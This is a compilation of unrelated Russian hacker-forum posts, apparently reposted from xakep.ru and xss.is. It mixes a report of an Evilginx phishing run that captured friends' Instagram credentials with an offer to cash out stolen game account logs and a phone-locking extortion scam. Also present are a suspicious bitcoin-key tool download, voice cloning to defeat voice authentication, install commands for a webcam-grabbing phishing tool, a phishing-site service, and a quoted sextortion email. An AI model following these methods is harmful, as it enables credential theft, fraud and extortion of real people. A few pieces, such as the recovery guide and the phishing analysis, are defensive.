content%2Fuploads%2F2019%2F10%2F244615%2F14.jpg&hash=0d98ab9e3f89c73352e63a071de87203)
Пример фишинговой рассылки
Эти люди меня знали, а большинство автоматически доверяют знакомым. К тому же есть элемент интриги. Интересно же узнать, что там такого придумано? Тем более в WhatsApp автоматически добавилось превью веб-страницы с логотипом Instagram.
Эти два аспекта я брал как опорные точки атаки. В итоге из 20 человек 16 перешли по ссылке и трое решились ввести логин и пароль. Скорее всего, остальные поленились их вспомнить, так как пользуются «Инстаграмом» через приложение и не авторизуются в нем каждый раз. Никаких вопросов мне не задавали и сомнений в безопасности процедуры не выражали.
![Результат «рыбалки»](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F244615%2F11.png&hash=763f0564ee3b219b060405ccaa6c0516)
Результат «рыбалки»
Когда три человека слили свои креды и ничего необычного по ссылке не обнаружили, они спросили: «Что же там такого?». Я просто ответил: «Уже ничего. Наверное, это была тестовая штуковина». На этом все сомнения развеялись. Во все три аккаунта я мог войти без пароля, используя сессии. Так что 2FA больше не защищала их.
Важный момент: поскольку большинство пользователей смотрят Instagram через приложение, после фишинговой атаки у меня остается длительный доступ. Сессия авторизации живет до того момента, пока пользователь заново не зайдет по фишинговой ссылке или не выйдет из аккаунта. Обе ситуации маловероятны. Учитывая эти практические аспекты, держать виртуальную свечку у жертвы над головой можно очень и очень долго.
Защита
У меня был тестовый стенд, поднятый с целью демонстрации возможностей Evilginx 2. Поэтому я не стал заморачиваться с обфускацией атаки и накладывать дополнительные слои для запутывания — все было поднято на раз и на голом скелете. Как показала практика, даже в таком виде атака успешно работает.
Какие-либо технические меры для защиты от подобных атак придумать сложно. Тем более что авторизация через соцсети может быть встроена на любой сайт. Поэтому главным «антивирусом» будет обычный принцип разумного сомнения. Если ты переходишь по присланной ссылке, а в итоге открывается приглашение ввести данные своей учетки в Instagram (или другом сервисе), в голове должен раздаваться тревожный звонок.
автор @8bit
хакер.ру
Какие только способы заработка не появились благодаря интернету. Пытливые умы придумывают все новые пути обогащения. Сегодня мы познакомим вас с одним из видов «онлайн-бизнеса», который вызывает у людей противоречивые чувства.
Сайт «Check You» публикует фотографии интимного характера и переписку с реальными девушками из социальных сетей. Жертвами сайта становятся как одинокие девушки, так и те, у кого есть парень или муж.
Для того, чтобы заполучить компрометирующие материалы, «проверяющий» знакомится с девушкой через соцсеть или электронную почту, представляется бизнесменом и предлагает сопровождать его на деловом ужине. В процессе переписки он обещает жертве дорогие подарки и деньги от 8 000 рублей до $7 500 за ночь в отеле. Иногда предложение от его имени делает девушка, якобы ассистент бизнесмена или представитель агентства.
В некоторых случаях девушкам с самого начала в лоб задают вопрос о том, не хотят ли они попробовать себя в роли содержанок.
Как бы то ни было, после того, как проверяемая девушка согласится, ее просят отправить фотографии в обнаженном виде, якобы для того, чтобы «бизнесмен» мог оценить то, что он покупает.
Также используется и другая схема: размещается вакансия (домработница, помощница руководителя и т.д.) и откликнувшимся девушкам сообщается, что за такую высокую зарплату (120 000-180 000 рублей) соискательница должна будет оказывать интимные услуги руководителю. После получения согласия, «руководитель» также требует отправить фотографии в стиле ню, чтобы оценить товар лицом.
Чтобы окончательно убедить девушку, парень обещает отправить деньги на покупку одежды, чтобы она смогла подготовиться к скорой встрече с новым знакомым. Но как только он получает фотографии, парень пишет ей: «Вся твоя переписка и снимки сохранены, список твоих друзей мы знаем» или что-то в этом роде.
Некоторые жертвы утверждают, что они подвергались шантажу с целью вымогательства денег, но сам сайт отметает подобные обвинения. Реакция у девушек, после того, как раскрываются все карты, разная — кто-то строит хорошую мину при плохой игре, показывая безразличие, кто-то умоляет не публиковать ее материалы, давя на жалость, а кто-то отрицает свое участие в переписке, ссылаясь на взлом (обычно так делают замужние).
Владельцем сайта является уроженец Санкт-Петербурга, бывший пикапер Сергей Чернышев, который основал проект еще в 2012 году. Сам сайт начал свою работу с 2013 года. Весь «бизнес» прикрывается благими намерениями о том, что сайт борется с неверностью девушек, подвергая их публичному позору и очищает мир от продажной любви. Но на самом деле Check You, существующий как минимум седьмой год, зарабатывает деньги на человеческом любопытстве и желании покопаться в чужом грязном белье.
Как монетизируется сайт? Все очень просто: сайт продает платный доступ к материалам. К качеству материалов и их подлинности нареканий нет — в анкете каждой девушки аккуратно собрана вся переписка, фотографии под самыми разными ракурсами и иногда даже видеозаписи. Доступ ко всем материалам сайта на одну неделю стоит 150 рублей, а на месяц — 600 рублей.
У анкет, добавленных несколько лет назад, под треть миллиона просмотров, а новые анкеты сразу же набирают 2 000-3 000 просмотров.
Если принять во внимание, что смысла просматривать анкету без оплаченного аккаунта практически нет, то сайт зарабатывает немалые деньги (неизвестно, сколько человек купили платный аккаунт). Общее количество «досье» на девушек со скринами переписок, видео и фотографиями перевалило за 3 300. Также трудно вычислить точное количество посетителей, так как трафик распределяется по многочисленным зеркалам, созданным после того, как РКН заблокировал сайт. Отдаленно об ежедневном трафике можно судить по тому факту, что, к примеру, за сутки — с 17 октября по 18 октября, только новые анкеты, размещенные в те же дни, были просмотрены более 17 000 раз. Так как у нас нет точных инструментов измерения трафика по всем зеркалам, то нам остается только предполагать. Если допустить, что один пользователь может просмотреть все анкеты (за сутки были размещены 10 анкет) по два раза, то, возможно, в настоящее время сайт имеет по скромным подсчетам 800-900 подписчиков. В неделю от них может поступать от 120 000 рублей, не считая заказных проверок и других источников дохода. На самом деле доход может быть больше в разы.
Что касается заказных проверок — кроме платного доступа, владельцы сайта имеют доход от проверок девушек и жен мужьями за деньги. Одну проверку сотрудники сервиса готовы провести за 1 000 рублей. После проверки добытый материал по желанию мужа или парня может быть выложен на сайт.
Находятся немало тех, кто поддерживают деятельность сайта — мол, лес рубят, щепки летят и должен же кто-то бороться с распущенностью современных девушек. В то же время в последнее время громче всех раздаются голоса тех, кто осуждает работу Check You. Они утверждают, что сайт нарушает неприкосновенность частной жизни и ломает жизнь своих жертв. Но сайт и не скрывает свою миссию, выраженную в девизе «Ломаем жизни/рушим судьбы». За деньги, разумеется.
Источник: partnerkin.com
Что делает софт:
Генерирует приватные ключи на основе последних блоков blockchain.com
Чекает на баланс и сохраняет в формате: BTC Addres:Key
Ключи если найдет импортируем в кошелек, например для blockchain.com кошелька
импортируем тут:
https://login.blockchain.com/ru/#/settings/addresses/btc
Шанс выпадения ключа очень низкий и более высокий если ваша видео карта и процессор обладают хорошей мощности. Не говорю уже про запуск на мощной ферме.
Может выпасть совершенно любой ключ с адресом да же с 1000btc на балансе. Как
повезет.
У меня лично работает постоянно когда сплю, малоли)
Скачать:
https://mega.nz/#!s4Q0yCLK!0MAcLUXYI02ME3363iKe_R_vnkjUx4ob9HnTJF4cIiA
https://www.virustotal.com/gui/file...55de5f54b0d42dfba28fce0b1e3b60737b9/detection
Несколькими ав палится как Xpack может на пакеры. Не куда не стучит не куда не дропается. Не знаю да же работает вообще или нет) так как шанс выпадания ключа пздц какой маленький тем более с моей GT710 2гб
**Заходим в группы по типу "продам аккаунт Clash of Clans, Clash Royale" и т.
п. Идём в комменты и ищем людей, которые хотят купить аккаунт. В основном это
те, кто пытаются вас кинуть, но это нам не мешает, выбираем любого
пользователя онлайн и пишем ему:
**
**
Вы ему кидаете скрины какой-то 9ТХ с з-бэст прокачкой и говорите цену в
400-500 рублей
Он естественно просит проверку, но это нам и надо!
В чём сама афёра. Вы регаете пустой аккаунт в гугле, не выходите с него и скидываете ему логин и пароль. Он бежит это всё дело проверять, а вы заходите на страницу Find My Device для поиска его телефона, обновляете пока человек не зайдёт, потом у вас отобразится его мобила, выбираете её и... Там есть функция блокировки телефона, на неё тыкайте.
Всё, дело за малым, главное, чтобы у него было другое устройство, комп/планшет/другой телефона, они пишет вам, мол "что за дела?", а вы говорите ему, что данную блокировку он нигде не снимет, сервисов таких нет, доводите школьника до пика пуканодетонации, а потом говорите цену.**
Суть в заголовке, линк - www.pathofexile.com
Ваши ~60%, мои 35%, 5% - комиссия на переводы.
Это игра, огромных денег скорее всего не получите(хотя шанс такой есть), но
лишняя копеечка скорее всего в кармане может появиться.
Отработаю в кратчайшие сроки, оплчивать буду в бтс.
Каких-то конкретных цифр нет, все зависит от аккаунта.
Скажу так, от 0р до 20к с одного лога.
Если аккаунт, хороший и принадлежит не школьнику, скорее всего вы получите
какой-то профит.
Если аккаунт школьника, без денег, который заходит в игру на 1 час в неделю,
скорее всего профита с него не будет.
Можете присылать логи в лс, залив их на какой-нибудь sendspace, с ссылкой на
удаление.
Нужна валид почта, без нее зайти слить что-либо - не получится, поэтому
приветствуются свежие логи.
Ничего кроме своего запроса не трогаю, после отработки - удаляются.
Отчетность(если это так можно назвать) - предоставлю.
Всем доброго времени суток, возник у меня вопрос.
Есть база активных номеров около 5000000.
Что с ними можно сделать, и как заработать?
Способов идентифицировать человека по голосу появляется все больше. И параллельно исследователи придумывают, как обойти эти механизмы — и для защиты собственной персональной информации, и для взлома защищенных таким образом систем. Я решил разобраться в самых последних достижениях ученых в этой сфере, чтобы рассказать обо всем тебе.
Генерация голоса
Голос человека — результат движения связок, языка, губ. В распоряжении
компьютера только числа, изображающие записанную микрофоном волну. Как же
компьютер создает звук, который мы можем услышать из динамиков или наушников?
Текст в речь
Один из самых популярных и исследованных методов генерации звуков — прямое
преобразование текста, который нужно воспроизвести, в звук. Самые ранние
программы такого рода склеивали отдельные буквы в слова, а слова — в
предложения.
С развитием программ-синтезаторов набор заранее записанных на микрофон букв стал набором слогов, а затем и целых слов.
Преимущества таких программ очевидны: они просты в написании, использовании, поддержке, могут воспроизводить все слова, какие только есть в языке, предсказуемы — все это в свое время стало причиной их коммерческого использования. Но качество голоса, созданного таким методом, оставляет желать лучшего. Все мы помним отличительные черты такого генератора — бесчувственная речь, неправильное ударение, оторванные друг от друга слова и буквы.
Звуки в речь
Этот способ генерации речи относительно быстро заменил собой первый, поскольку
лучше имитировал человеческую речь: мы произносим не буквы, а звуки. Именно
поэтому системы, основанные на международном фонетическом
алфавите
— IPA, более качественны и приятны на слух.
В основу этого метода легли заранее записанные в студии отдельные звуки, которые склеиваются в слова. По сравнению с первым подходом заметно качественное улучшение: вместо простого склеивания аудиодорожек используются методы смешивания звуков как на основе математических законов, так и на основе нейронных сетей.
Речь в речь
Относительно новый подход полностью основан на нейронных сетях. Рекурсивная
архитектура [WaveNet](https://deepmind.com/blog/article/wavenet-generative-
model-raw-audio), построенная исследователями из DeepMind, позволяет
преобразовывать звук или текст в другой звук напрямую, без привлечения заранее
записанных строительных блоков (научная
статья).
Ключ к этой технологии — правильное использование рекурсивных нейронов Long Short-Term Memory, которые сохраняют свое состояние не только на уровне каждой отдельной клетки нейронной сети, но и на уровне всего слоя.
![Схема работы WaveNet](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F241233%2Fwavenet.gif&hash=164dd0dd09cc05b0102722b842f54849)
Схема работы WaveNet
В целом эта архитектура работает с любым видом звуковой волны, вне зависимости от того, музыка это или голос человека.
На основе WaveNet есть несколько проектов.
Для воссоздания речи такие системы используют генераторы звуковой нотации из текста и генераторы интонаций (ударения, паузы), чтобы создать натурально звучащий голос.
Это самая передовая технология создания речи: она не просто склеивает или смешивает непонятные машине звуки, но самостоятельно создает переходы между ними, делает паузы между словами, меняет высоту, силу и тембр голоса в угоду правильному произношению — или любой другой цели.
Создание поддельного голоса
Для самой простой идентификации, про которую я рассказывал в своей предыдущей
статье, подойдет практически любой метод — особенно удачливым хакерам может
хватить даже необработанных пяти секунд записанного голоса.
Но для обхода более серьезной системы, построенной, например, на нейросетях,
нам понадобится настоящий, качественный генератор голоса.
Принцип работы имитатора голоса
Для создания правдоподобной модели «голос в голос», основанной на WaveNet,
потребуется множество усилий: нужно записать большое количество текста,
сказанного двумя разными людьми, причем так, чтобы все звуки совпадали секунда
в секунду, — а сделать это сложновато. Однако есть и другой метод.
Основываясь все на тех же принципах, что и технология синтеза звука, можно достичь не менее реалистичной передачи всех параметров голоса. Так, была создана программа, которая клонирует голос на основе небольшой записи речи. Именно ее мы с тобой и используем.
Сама программа состоит из нескольких важных частей, которые работают последовательно, поэтому разберемся поэтапно.
Кодирование голоса
Голос каждого человека обладает рядом характеристик — их не всегда можно
распознать на слух, но они важны. Чтобы точно отделять одного говорящего от
другого, будет правильным создать специальную нейронную сеть, формирующую свои
наборы признаков для разных людей.
Этот кодировщик позволяет в дальнейшем не только переносить голос, но и сравнивать результаты с желаемыми.
![Так выглядят 256 характеристик
голоса](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F241233%2Ffeatures.png&hash=2ac9324aa933edcf0f71ff0c31f3b8c0)
Так выглядят 256 характеристик голоса
Создание спектрограммы
На основе этих характеристик можно из текста создать мел-спектрограмму звука.
Этим занимается синтезатор, в основе которого лежит Tacotron 2, использующий
WaveNet.
![Пример сгенерированной
спектрограммы](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F241233%2Fmel.jpg&hash=83e1d62a5cb85ec1b9fab611dcb5933d)
Пример сгенерированной спектрограммы
Сгенерированная спектрограмма содержит всю информацию о паузах, звуках и произношении, и в ней уже заложены все заранее вычисленные характеристики голоса.
Синтез звука
Теперь другая нейронная сеть — основанная на
WaveRNN — будет постепенно создавать из
мел-спектрограммы звуковую волну. Эта звуковая волна и станет воспроизводиться
как готовый звук.
Все характеристики основного голоса сохраняются в синтезированном звуке, который, пусть и не без трудностей, воссоздает исходный голос человека на любом тексте.
Тестирование метода
Теперь, зная, как создать правдоподобную имитацию голоса, давай попробуем
применить это на практике. В прошлой статье я рассказывал про два очень
простых, но рабочих метода идентификации человека по голосу: с использованием
анализа мел-кепстральных коэффициентов и с помощью нейронных сетей, специально
обученных определять одного человека. Давай узнаем, насколько хорошо мы можем
обмануть эти системы поддельными записями.
Возьмем пятисекундную запись голоса мужчины и создадим две записи с помощью нашего инструмента. Оригинал и записи, которые у меня получились, можно [скачать или послушать](https://xakep.ru/wp- content/uploads/2019/10/synth.zip).
Сравним эти записи с помощью мел-кепстральных коэффициентов.
![Вид коэффициентов на графике](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2019%2F10%2F241233%2Fcepstrum.png&hash=2f689e9363aa7c38242debde3711936c)
Вид коэффициентов на графике
Разница в коэффициентах также видна и в числах:
Code:Copy to clipboard
Синтез_1 - оригинал: 0.38612951111628727
Синтез_2 - оригинал: 0.3594987201660116
Как же отреагирует на такую хорошую подделку нейронная сеть?
Code:Copy to clipboard
Синтез_1 - оригинал: 89.3%
Синтез_2 - оригинал: 86.9%
Убедить нейросеть оказалось возможно, но не в совершенстве. Серьезные системы безопасности, которые установлены, например, в банках, скорее всего, смогут детектировать подделку, но человек, тем более по телефону, вряд ли сумеет отличить настоящего собеседника от его компьютерной имитации.
Выводы
Подделать голос сейчас уже не так сложно, как было раньше, а это открывает
большие возможности не только для хакеров, но и для создателей контента: инди-
разработчики игр смогут сделать качественную и дешевую озвучку, аниматоры —
озвучить своих персонажей, а режиссеры фильмов — снять достоверную
документалку.
И пусть технологии качественного синтеза речи еще только развиваются, но их потенциал уже сейчас захватывает дух. В скором времени все голосовые помощники обретут свой личный голос — не металлический, холодный, а наполненный эмоциями и чувствами; чат с техподдержкой перестанет раздражать, а ты сможешь заставить свой телефон отвечать на неприятные звонки вместо тебя.
Автор @kireevmp, Михаил Киреев
хакер.ру
Взлом аккаунтов в Facebook - одна из самых популярных тем в Интернете. Многие люди становятся жертвами взлома Facebook, так как более половины из них не могут восстановить взломанный аккаунт из-за неосведомленности о методах восстановления. Эти варианты восстановления помогут вам легко восстановить вашу учетную запись.
Позвольте мне раскрыть возможности взломанных учетных записей Facebook и методы их восстановления.
Кроме того, узнайте, как хакер взломает учетные записи Facebook за несколько минут и как предотвратить взлом вашего аккаунта.
1. Забыли пароль или пароль изменен
Это наиболее распространенный случай восстановления взломанной учетной записи Facebook, когда пароль был изменен, но в вашей учетной записи Facebook все еще есть связанный адрес электронной почты или номер мобильного телефона.
Перейти на Facebook, и нажать забыли пароль?
Введите свой адрес электронной почты или номер мобильного телефона или имя
пользователя или имя в текстовом поле и нажмите кнопку поиска. Как правило,
имя не рекомендуется, так как может быть более одного человека с одинаковым
именем. Имя пользователя - это уникальный идентификатор Facebook, который вы
можете найти в своем профиле.
Вы должны увидеть свой профиль с адресом электронной почты для восстановления
и номером мобильного телефона, если таковые имеются. Выберите номер мобильного
телефона или адрес электронной почты, к которым вы можете обратиться прямо
сейчас, и нажмите «Продолжить».
Проверьте свой почтовый ящик, если вы выберете электронную почту / мобильный
почтовый ящик, если вы выбираете номер мобильного телефона, чтобы получить код
восстановления. Введите код восстановления, чтобы продолжить.
Вот и все. Установите новый пароль и вернитесь в свою учетную запись Facebook.
2. Пароль изменен и нет доступа к связанной электронной почте
В этом случае хакер изменил ваш пароль на Facebook, и вы потеряли или забыли
пароль своей электронной почты, в результате чего у вас нет доступа к
электронной почте, связанной с Facebook.
Введите свой адрес электронной почты или номер мобильного телефона или имя
пользователя или имя в текстовом поле и нажмите кнопку поиска.
Нажмите «У вас больше нет доступа к ним?» В нижней части диалогового окна
сброса пароля. Параметры восстановления Facebook
Вы будете перенаправлены на расширенные варианты восстановления. Это может
отличаться для разных учетных записей Facebook
Секретный вопрос: эта опция недоступна для новых учетных записей Facebook,
но ее могут использовать старые пользователи Facebook. Вы можете ответить на
этот вопрос, чтобы перейти к установке нового пароля, если он указан в
качестве одного из расширенных параметров восстановления.
Доверенные контакты : вы можете использовать эту опцию, только если вы уже
выбрали доверенные контакты.
Введите новый адрес электронной почты или телефон, к которому вы можете
получить доступ, и нажмите «Продолжить».
Нажмите «Показать мои доверенные контакты» и введите полное имя одного из
доверенных контактов.
Вы увидите набор инструкций, который включает URL. URL содержит специальный
защитный код, доступ к которому могут получить только ваши доверенные
контакты. Позвоните своим друзьям и дайте им URL, чтобы они могли открыть
ссылку и дать вам код безопасности.
Используйте коды безопасности из ваших доверенных контактов для доступа к
вашей учетной записи.
3. Пароль и связанный адрес электронной почты изменены
Здесь хакер изменил ваш пароль и адрес вашей электронной почты. Этот случай
несколько трудно восстановить, поскольку хакер заблокировал способ
восстановления. У нас есть два варианта в этом случае. У вас должен быть
доступ к номеру мобильного телефона или старому адресу электронной почты.
Восстановить, используя номер мобильного телефона
Перейти на Facebook Забыли пароль?
Введите номер вашего мобильного телефона в текстовое поле и нажмите кнопку
поиска.
Вы должны увидеть свой профиль с адресом электронной почты для восстановления
и номером мобильного телефона, если таковые имеются. Выберите номер мобильного
телефона или адрес электронной почты, к которым вы можете обратиться прямо
сейчас, и нажмите «Продолжить».
Выберите номер своего мобильного телефона и нажмите «Продолжить».
Проверьте свой мобильный почтовый ящик на наличие кода восстановления и
введите восстановленный код в соответствующее текстовое поле.
Вот и все. Установите новый пароль своей учетной записи Facebook.
Восстановить с помощью уведомления об изменении электронной почты
Этот метод может быть применен, только если вы попытаетесь в течение
нескольких дней после того, как ваш аккаунт был взломан.
Войдите в свою учетную запись электронной почты (адрес электронной почты,
который вы дали на Facebook) и выполните поиск писем от Facebook об изменении
адреса электронной почты. Обычно темой сообщения электронной почты будет
«Основная электронная почта Facebook изменена на».
Нажмите на ссылку «Если вы этого не сделали, пожалуйста, защитите свою учетную
запись» в этом письме.
Вам будет предложено «Защитить свою учетную запись», нажмите «Продолжить»,
чтобы продолжить.
На следующем этапе могут быть предложены различные варианты восстановления в
зависимости от вашей учетной записи и безопасности.
Загрузить идентификатор: вы должны загрузить правительственный
идентификатор с помощью указанных шагов. Представитель Facebook проверит это и
активирует ваш аккаунт, а также уведомит об этом по электронной почте.
Подтвердите свою дату рождения: вы должны ввести свою дату рождения, чтобы
перейти в свою учетную запись Facebook.
Угадайте своих друзей по их фотографиям: вам нужно выбрать 5 друзей из 7,
увидев их фотографии.
**
Spoiler: Официальная статья, переводчик
переведено эксклюзивно для xss.is
перевёл https://xss.is/members/187726/
оригинал статьи <https://thezerohack.com/3-ways-recover-hacked-facebook-
account>
Желаю удачи, и не попадаться на крючке мошенников
**
Задача данного инструмента - сделать фотографию того, кто перейдет по Вашей ссылке.
![](/proxy.php?image=https%3A%2F%2Fuser- images.githubusercontent.com%2F34893261%2F56869077-e5714d80-69d1-11e9-8ce2-29a254021890.jpg&hash=41a3affd9bd5487de8c515095f84292c)
Инструмент генерирует вредоносную страницу HTTPS, используя методы
переадресации портов Serveo или Ngrok, и код javascript для отслеживания
запросов с помощью
[MediaDevices.getUserMedia.](https://developer.mozilla.org/en-
US/docs/Web/API/MediaDevices/getUserMedia)
Суть всего этого в том, что когда жертва перешела по Вашей ссылке, у Вас в
логах появляется ip адрес, и с промежутком в 5 секунд, Вам будут поступать
фотографии того, кто перешел по ссылке.
ссылка:
Grab target's webcam shots by link. Contribute to thelinuxchoice/saycheese development by creating an account on GitHub.
github.com
**
установка:**
Bash:Copy to clipboard
git clone https://github.com/thelinuxchoice/saycheese
cd saycheese
bash saycheese.sh
[CLIKE]
В последнее время люди часто интересуются фишинг сайтами, но не все умеют
устанавливать скрипты и покупать хостинг. Этому есть решение - готовый фишинг
сайт. На сайте https://snif-f.ru (не реклама) есть множество различных
фейков начиная от Вконтакте и заканчивая Танками.
Spoiler: Сайт
Spoiler: P.S
Я не рекламирую данный сайт, я просто рассказываю про него.
[/CLIKE]
Приветствую каждого кто обратил внимание и прошу не пинать за возможное
появление ошибок в тексте.
События происходили 1,5 года назад и предлагаю вспомнить прекрасную зимнюю
атмосферу ведь именно из-за плохих погодных условий приходилось кататься на
карж таксо .
В этом рассказе я задену одну из немногих человеческих «болячек» как
Доверие и желание поскорее избавиться от напрягов по работе ..
Зная об особенностях этих сервисов как и подобает прыгаю в кар и уточняю у
шефа каким образом выставлена оплата? буквально несколько минут и слышу
необходимые для меня слова , а машина плавно двигает в сторону ожидающих
знакомых.
На улице неспешно менялись краски в более тёмные тона а в ушах играли любимые
песни) как вдруг я узнаю что способ оплаты сменился на наличные ,которых ,увы,
не было)) не стал переспрашивать у шофёра,но пердак подгорал дальше чем видел
этот свет и как назло долбанные пробки . С дальнейших кадров я был мягко
говоря в @хue . Пока мы пробивались в медленном потоке машин к нам в тачку
забегают уже явно потрёпанная годами мадам и ее дочь)
Просили срочно подвезти т.к. сильно опаздывали на дебютный концерт малой , по
счастливой случайности это было по пути и в скором будущем я размышлял как
свинтить? Бегать не хотелось но и с позорном выскакивать не думал . На
очередном перекрёстке мы в ожидании зелёного цвета решили обсудить как он нас
рассчитает. И где мне выйти? Чуете где жаренным пахнет?!) Говорю что выйду тут
т.к. моя точка недалеко , а семейка спокойно доедет в тот час давать их первый
концерт) извозчик затупил , а мою голову посетила мысль закрепить успех
нелепого чуда и вслух вспоминаю как спрашивал про карту в самом начале.
Казалось бы какая мелочь ?!?! Дурень не теряя ни минуты выпускает в свободное
плавание очередного джентльмена удачи и несётся прокладывать другие маршруты
К чему я это все расписал?!
В последнее время спам и фишинг все чаще используются для введения пользователя в заблуждение. С помощью этих методов злоумышленники часто распространяют программы-вымогатели и крадут учетные данные жертв. Для защиты от подобных атак как с технической, так и психологической стороны, необходимо понимать, как работают мошенники, а для этого детально разберем в статье «вредоносные» письма и сайты.
Введение
Очень часто на корпоративные и личные почтовые ящики приходят фишинговые письма. Название атаки одно (фишинг), но реализаций у данной техники множество. Обычно в корпоративную среду доставляются зловреды: вирусы, трояны, кейлоггеры, бэкдоры или шифровальщики. Цели у этих мероприятий разные.
В отношении же личной почты, о чем и пойдет речь дальше, практически любые уловки направлены на получение экономической выгоды. Спамеры используют фишинговые сайты, угрозы, просьбы о помощи и любые другие средства социальной инженерии, лишь бы получить перевод или данные банковской карты.
Тема уже давно не новая, и, казалось бы, маловероятно, что кто-то купится на такую уловку, однако только спрос рождает предложение — раз это еще используется, значит, работает.
Спам, фишинг и социальная инженерия
Хоть это уже и не совсем актуально, большинство людей, используя эти термины в разговоре, не всегда применяют данные понятия по назначению. Например, брутфорс и атака по словарю — метод один и тот же, но подходы разные.
Поэтому немного терминологии:
Спам — это любые рассылки сообщений, и не обязательно от злоумышленника. Любые нежелательные рекламные письма, на получение которых получатель не давал согласия. Они происходят массово и нецеленаправленно.
Фишинг — это кампании, нацеленные на получение выгоды от жертвы (аутентификационных данных, денег). Часто это понятие пересекается со спамом в сумме с социальной инженерией, но спам и фишинг существуют параллельно друг с другом. Например, создание поддельного сайта с перехватом учетных данных или cookie-сессий.
Социальная инженерия (СИ) — это некие психологические техники, которые используют хакеры. Они используется для убеждения жертвы в чем-либо или чтобы предвидеть ее действия. Профессиональные социальные инженеры практически «взламывают» людей, а обычным хакерам достаточно знать основные точки давления. Подробнее об этом мы писали [здесь](https://www.anti- malware.ru/threats/social-engineering).
Как правило, для хорошей кампании необходимо использовать все три понятия. В данных техниках одно без другого не будет иметь положительного результата.
Приведенные техники описаны только для ознакомления. Ни автор, ни редакция не несут ответственности за вред, нанесенный описанными способами.
Техника устаревшая, 2014-2015 годов (до ввода двухфакторной аутентификации), в реальных примерах уже почти не встречается.
Есть множество хакерских форумов, где можно заказать, к примеру, взлом страницы социальной сети. Реальный взлом аккаунта vk.com посредствам фишинга выглядит так:
Рисунок 1. Код фишинговой валидации vk.com
![Код фишинговой валидации vk.com](/proxy.php?image=https%3A%2F%2Fanti- malware.ru%2Ffiles%2Fphishing-16-07-2019%2F1.png&hash=b43f29788e153c5eba81f3eeb173cb17)
Это реальный пример грамотного фишинга, в котором используется социальная инженерия и спам. Он направлен на одну жертву, поэтому все должно выглядеть правдоподобно. Внушается доверие от автора сообщения (это же администрация, ей можно доверять), и теряется бдительность, а дальше — дело техники.
Разбор фишинговых сообщений
Данное письмо пришло сотруднику одной IT-компании:
06.06.2019, 09:45, "Твой кошмар - Info" [email protected]>:
_Привет.
Я думаю, вы не будете счастливы, потому что у меня для вас очень плохие новости.
Всего несколько месяцев назад (04/03/2019) я взломал вашу операционную систему и полностью контролировал ваше устройство. Я имплантировал в ваше устройство небольшое приложение, которое отправляет мне ваш текущий IP-адрес и позволяет мне подключаться к вашему устройству, как удаленный рабочий стол. Даже если вы измените свой пароль, это не поможет.
Как я заразил тебя? Маршрутизатор, который вы использовали для подключения к Интернету, имел дыру в безопасности. Вы можете прочитать об этой проблеме, выполнив поиск CVE-2018-10562. Я взломал ваш роутер и вставил в него свой код, и когда вы попытались подключиться к Интернету, моя программа заразила ваше устройство.
Позже я сделал полную копию вашего жесткого диска (у меня есть все ваши списки контактов электронной почты, список сайтов, которые вы посетили, номера телефонов, пароли и т. Д.)
Некоторое время спустя, когда я искал вашу историю просмотра веб-страниц, и я был шокирован увиденным !! Сайты для взрослых, которые вы посещаете ... вы знаете, что я имею в виду ...
Я просто хочу сказать - ваши фантазии сместились далеко от обычного курса!…
Последние 2 месяца я шпионил за вами через камеру вашего устройства ...
особенно, когда вы посещали эти сайты, чтобы повеселиться ...
Эти ролики ясно показывают, что вам весело, и контент для взрослых, который вы
смотрели ... это довольно неприятно, и я бы очень волновался на вашем месте.
Я получил 4 видео:
Info_esia_pro_1557645653.mp4 (41.0 MB)
Info_esia_pro_1557627975.mp4 (76.4 MB)
Info_esia_pro_1557617028.mp4 (41.5 MB)
Info_esia_pro_1558066450.mp4 (29.0 MB)
Вы можете убедиться, что временные метки соответствуют моментам, когда вы наслаждались ...
Теперь, потому что мне совсем не нравится то, что я видел (это довольно безумно и безобразно), я прошу вас отправить мне пожертвование через сеть Биткойн.
150 000 российских рублей - это справедливая цена (учитывая ваши извращения).
Если вы хотите, чтобы я забыл обо всем этом деле, удалите файлы и отключите противное приложение, которое шпионит за вами, отправьте мне платеж Bitcoin в течение 72 часов. Да, я даю вам только 72 часа.
Вот мой кошелек:
0.293514 BTC = 150 000 руб.
Если вы не отправите мне Биткойн, я обещаю вам - я отправлю эти 4 файла вместе с вами во все ваши списки контактов, партнеров и друзей в социальных сетях.
У меня все еще есть доступ к вашему устройству, и я знаю, когда вы читаете это сообщение. Когда вы открыли его, время начало тикать. У вас есть только 72 часа!
Я из Индии, и никто не поможет вам, если вы сообщите об этом письме. Прежде чем они найдут меня, ваша жизнь будет разрушена! Если вы не будете сотрудничать со мной - я немедленно опубликую этот уродливый материал.
Вот почему я советую вам - отправьте мне биткойн и давайте забудем обо всей ситуации. Я знаю, ты можешь себе это позволить.
Если вы не знаете, как отправить биткойн, зайдите в Google и поищите, как это сделать. Есть много вариантов, таких как CoinBase.
Вот мой адрес снова:
=======================================
Отправить точно:
0.293514 BTC
на мой адрес:
34bcuAhu7x8u19MCJVD7AHVjJZcLj1yjyK
=======================================
Не забудьте отправить точную сумму, как указано выше! Таким образом, я буду знать, что это от вас.
Не сердись на меня. Это просто моя работа, и вы не единственный, кого я поймал.
Злитесь на свои фантазии - если бы вы не посещали эти сайты для взрослых, у вас не было бы проблем ... но сейчас ...
Я жду твоего биткойна.
Помните, время идет ...
--
анонимное
Мы анонимы. Мы легион.
Мы не прощаем. Мы не забываем.
Ожидайте нас._
Типичное письмо-вымогатель. Такой текст направлен на людей с расшатанной психикой или несформированной личностью. Достаточно грамотно составлено, однако имя жертвы нигде не встречается. Из чего можно сделать вывод, что злоумышленник его и вовсе не знает, а отправляет письма массово.
Упоминания о друзьях в соцсетях, о которых хакер якобы знает, нагоняют еще больший ужас на получателя. Эта уловка действенна, но с другой стороны, угадать что у пользователя есть аккаунт в соцсети, все равно что угадать, что у него есть соседи. А вот упоминание о списке контактов — это ошибка. Очень маленький процент пользователей хранит на компьютере что-то подобное, а о синхронизации и вообще не может быть и речи. Плюс неплохой русский язык для автопереводчика.
